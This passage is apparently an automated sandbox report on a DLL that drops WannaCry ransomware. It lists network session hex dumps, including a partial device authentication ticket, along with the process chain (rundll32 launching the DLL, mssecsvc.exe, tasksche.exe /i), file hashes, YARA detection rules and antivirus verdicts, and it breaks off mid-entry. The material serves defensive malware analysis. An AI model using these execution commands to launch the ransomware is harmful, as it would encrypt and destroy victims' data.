                                                        Data Ascii: ATH 2 CON\DEVICE 1014Context: 4707b8cad3b3ff03<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAV5D/vM4M82HIpmMxNdA1Q6YUkce+NyAaC2skJBtDn0XjSlBbnVluB+qBH19SoGQZnkYCYgNX6HqjToMOiZtcfa6uRDtzH9v0xaKzz4c7VvH90BKakhvOAD15p33VUXb8d0F9Dtq9
                                                        2022-12-22 09:05:52 UTC6OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 37 30 37 62 38 63 61 64 33 62 33 66 66 30 33 0d 0a 0d 0a
                                                        Data Ascii: BND 3 CON\QOS 29Context: 4707b8cad3b3ff03
                                                        2022-12-22 09:05:52 UTC6INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2022-12-22 09:05:52 UTC6INData Raw: 4d 53 2d 43 56 3a 20 47 41 72 73 75 76 4f 64 4b 6b 6d 36 66 55 57 38 58 79 5a 52 35 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: GArsuvOdKkm6fUW8XyZR5g.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.55331320.90.156.32443C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        2022-12-22 09:06:17 UTC6OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 35 38 35 38 37 33 32 65 66 38 36 36 38 34 62 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 246Context: d5858732ef86684b
                                                        2022-12-22 09:06:17 UTC6OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                        2022-12-22 09:06:17 UTC7OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 35 38 35 38 37 33 32 65 66 38 36 36 38 34 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 35 44 2f 76 4d 34 4d 38 32 48 49 70 6d 4d 78 4e 64 41 31 51 36 59 55 6b 63 65 2b 4e 79 41 61 43 32 73 6b 4a 42 74 44 6e 30 58 6a 53 6c 42 62 6e 56 6c 75 42 2b 71 42 48 31 39 53 6f 47 51 5a 6e 6b 59 43 59 67 4e 58 36 48 71 6a 54 6f 4d 4f 69 5a 74 63 66 61 36 75 52 44 74 7a 48 39 76 30 78 61 4b 7a 7a 34 63 37 56 76 48 39 30 42 4b 61 6b 68 76 4f 41 44 31 35 70 33 33 56 55 58 62 38 64 30 46 39 44 74 71 39
                                                        Data Ascii: ATH 2 CON\DEVICE 1014Context: d5858732ef86684b<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAV5D/vM4M82HIpmMxNdA1Q6YUkce+NyAaC2skJBtDn0XjSlBbnVluB+qBH19SoGQZnkYCYgNX6HqjToMOiZtcfa6uRDtzH9v0xaKzz4c7VvH90BKakhvOAD15p33VUXb8d0F9Dtq9
                                                        2022-12-22 09:06:17 UTC8OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 35 38 35 38 37 33 32 65 66 38 36 36 38 34 62 0d 0a 0d 0a
                                                        Data Ascii: BND 3 CON\QOS 29Context: d5858732ef86684b
                                                        2022-12-22 09:06:17 UTC8INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2022-12-22 09:06:17 UTC8INData Raw: 4d 53 2d 43 56 3a 20 4d 77 61 55 48 38 4b 4c 4d 45 32 51 33 77 41 41 56 68 4f 73 63 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: MwaUH8KLME2Q3wAAVhOscQ.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        6192.168.2.55527420.90.153.243443C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        2022-12-22 09:06:50 UTC8OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 62 61 37 31 33 65 39 66 31 62 34 65 35 39 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 246Context: deba713e9f1b4e59
                                                        2022-12-22 09:06:50 UTC8OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                        2022-12-22 09:06:50 UTC8OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 62 61 37 31 33 65 39 66 31 62 34 65 35 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 35 44 2f 76 4d 34 4d 38 32 48 49 70 6d 4d 78 4e 64 41 31 51 36 59 55 6b 63 65 2b 4e 79 41 61 43 32 73 6b 4a 42 74 44 6e 30 58 6a 53 6c 42 62 6e 56 6c 75 42 2b 71 42 48 31 39 53 6f 47 51 5a 6e 6b 59 43 59 67 4e 58 36 48 71 6a 54 6f 4d 4f 69 5a 74 63 66 61 36 75 52 44 74 7a 48 39 76 30 78 61 4b 7a 7a 34 63 37 56 76 48 39 30 42 4b 61 6b 68 76 4f 41 44 31 35 70 33 33 56 55 58 62 38 64 30 46 39 44 74 71 39
                                                        Data Ascii: ATH 2 CON\DEVICE 1014Context: deba713e9f1b4e59<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAV5D/vM4M82HIpmMxNdA1Q6YUkce+NyAaC2skJBtDn0XjSlBbnVluB+qBH19SoGQZnkYCYgNX6HqjToMOiZtcfa6uRDtzH9v0xaKzz4c7VvH90BKakhvOAD15p33VUXb8d0F9Dtq9
                                                        2022-12-22 09:06:50 UTC9OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 62 61 37 31 33 65 39 66 31 62 34 65 35 39 0d 0a 0d 0a
                                                        Data Ascii: BND 3 CON\QOS 29Context: deba713e9f1b4e59
                                                        2022-12-22 09:06:50 UTC9INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2022-12-22 09:06:50 UTC9INData Raw: 4d 53 2d 43 56 3a 20 56 44 61 55 4f 47 37 47 51 30 61 4c 35 48 6c 30 79 50 59 64 44 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: VDaUOG7GQ0aL5Hl0yPYdDQ.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        7192.168.2.55786220.90.153.243443C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        2022-12-22 09:07:25 UTC9OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 62 62 38 32 34 34 62 31 34 36 35 37 62 38 66 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 246Context: 4bb8244b14657b8f
                                                        2022-12-22 09:07:25 UTC9OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                        2022-12-22 09:07:25 UTC9OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 62 62 38 32 34 34 62 31 34 36 35 37 62 38 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 35 44 2f 76 4d 34 4d 38 32 48 49 70 6d 4d 78 4e 64 41 31 51 36 59 55 6b 63 65 2b 4e 79 41 61 43 32 73 6b 4a 42 74 44 6e 30 58 6a 53 6c 42 62 6e 56 6c 75 42 2b 71 42 48 31 39 53 6f 47 51 5a 6e 6b 59 43 59 67 4e 58 36 48 71 6a 54 6f 4d 4f 69 5a 74 63 66 61 36 75 52 44 74 7a 48 39 76 30 78 61 4b 7a 7a 34 63 37 56 76 48 39 30 42 4b 61 6b 68 76 4f 41 44 31 35 70 33 33 56 55 58 62 38 64 30 46 39 44 74 71 39
                                                        Data Ascii: ATH 2 CON\DEVICE 1014Context: 4bb8244b14657b8f<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAV5D/vM4M82HIpmMxNdA1Q6YUkce+NyAaC2skJBtDn0XjSlBbnVluB+qBH19SoGQZnkYCYgNX6HqjToMOiZtcfa6uRDtzH9v0xaKzz4c7VvH90BKakhvOAD15p33VUXb8d0F9Dtq9
                                                        2022-12-22 09:07:25 UTC10OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 62 62 38 32 34 34 62 31 34 36 35 37 62 38 66 0d 0a 0d 0a
                                                        Data Ascii: BND 3 CON\QOS 29Context: 4bb8244b14657b8f
                                                        2022-12-22 09:07:25 UTC11INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2022-12-22 09:07:25 UTC11INData Raw: 4d 53 2d 43 56 3a 20 43 4d 46 47 41 56 4e 75 2b 6b 43 67 30 30 32 53 62 32 52 7a 4b 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: CMFGAVNu+kCg002Sb2RzKA.0Payload parsing failed.


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:10:04:05
                                                        Start date:22/12/2022
                                                        Path:C:\Windows\System32\loaddll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\mbXvGlj2dR.dll"
                                                        Imagebase:0x1310000
                                                        File size:116736 bytes
                                                        MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Target ID:1
                                                        Start time:10:04:05
                                                        Start date:22/12/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7fcd70000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:2
                                                        Start time:10:04:06
                                                        Start date:22/12/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mbXvGlj2dR.dll",#1
                                                        Imagebase:0x11d0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:3
                                                        Start time:10:04:06
                                                        Start date:22/12/2022
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\mbXvGlj2dR.dll,PlayGame
                                                        Imagebase:0x960000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:4
                                                        Start time:10:04:06
                                                        Start date:22/12/2022
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\mbXvGlj2dR.dll",#1
                                                        Imagebase:0x960000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:5
                                                        Start time:10:04:06
                                                        Start date:22/12/2022
                                                        Path:C:\Windows\mssecsvc.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\WINDOWS\mssecsvc.exe
                                                        Imagebase:0x400000
                                                        File size:3723264 bytes
                                                        MD5 hash:0C694193CEAC8BFB016491FFB534EB7C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000000.299041291.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000000.301622527.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000000.295691374.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000000.297200452.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000002.313837823.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000000.297315623.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000005.00000000.297315623.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000002.313956053.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000005.00000002.313956053.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000000.295748981.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000005.00000000.295748981.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000000.299133974.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000005.00000000.299133974.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000000.301753612.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000005.00000000.301753612.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                        • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (with the help of binar.ly)
                                                        • Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (based on rule by US CERT)
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvc.exe, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\mssecsvc.exe, Author: us-cert code analysis team
                                                        • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\mssecsvc.exe, Author: ReversingLabs
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 95%, ReversingLabs
                                                        Reputation:low

                                                        Target ID:6
                                                        Start time:10:04:09
                                                        Start date:22/12/2022
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\mbXvGlj2dR.dll",PlayGame
                                                        Imagebase:0x960000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:7
                                                        Start time:10:04:09
                                                        Start date:22/12/2022
                                                        Path:C:\Windows\mssecsvc.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\WINDOWS\mssecsvc.exe
                                                        Imagebase:0x400000
                                                        File size:3723264 bytes
                                                        MD5 hash:0C694193CEAC8BFB016491FFB534EB7C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000007.00000000.306395360.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000007.00000000.301358010.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000007.00000000.302971579.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000007.00000002.317584322.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000007.00000000.306519342.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000007.00000000.306519342.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000007.00000000.301466734.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000007.00000000.301466734.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000007.00000000.308634142.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000007.00000000.308739689.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000007.00000000.308739689.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000007.00000002.317673463.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000007.00000002.317673463.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000007.00000000.303052057.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000007.00000000.303052057.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                        Reputation:low

                                                        Target ID:8
                                                        Start time:10:04:11
                                                        Start date:22/12/2022
                                                        Path:C:\Windows\mssecsvc.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\WINDOWS\mssecsvc.exe -m security
                                                        Imagebase:0x400000
                                                        File size:3723264 bytes
                                                        MD5 hash:0C694193CEAC8BFB016491FFB534EB7C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000002.817946174.000000000042E000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000000.306091681.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000002.817996874.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000008.00000002.817996874.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000002.818892298.0000000001FD7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000008.00000002.818892298.0000000001FD7000.00000004.00000800.00020000.00000000.sdmp, Author: us-cert code analysis team
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000000.306158904.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000008.00000000.306158904.0000000000710000.00000002.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000002.820822570.00000000024FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000008.00000002.820822570.00000000024FC000.00000004.00000800.00020000.00000000.sdmp, Author: us-cert code analysis team

                                                        Target ID:9
                                                        Start time:10:04:13
                                                        Start date:22/12/2022
                                                        Path:C:\Windows\tasksche.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\WINDOWS\tasksche.exe /i
                                                        Imagebase:0x400000
                                                        File size:3514368 bytes
                                                        MD5 hash:7F7CCAA16FB15EB1C7399D422F8363E8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000009.00000000.309686904.000000000040E000.00000008.00000001.01000000.00000006.sdmp, Author: us-cert code analysis team
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmp, Author: us-cert code analysis team
                                                        • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\tasksche.exe, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
                                                        • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML

                                                        Target ID:10
                                                        Start time:10:04:15
                                                        Start date:22/12/2022
                                                        Path:C:\Windows\tasksche.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\WINDOWS\tasksche.exe /i
                                                        Imagebase:0x400000
